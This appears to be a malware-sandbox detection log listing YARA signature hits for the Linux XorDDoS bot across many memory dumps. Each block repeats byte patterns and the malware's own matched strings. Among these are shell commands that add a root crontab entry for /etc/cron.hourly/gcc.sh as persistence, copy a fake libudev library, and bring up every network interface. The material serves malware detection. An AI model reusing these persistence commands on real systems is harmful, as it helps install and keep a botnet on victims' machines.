6451.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6305.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6558.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6327.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6503.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6555.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6288.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6281.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
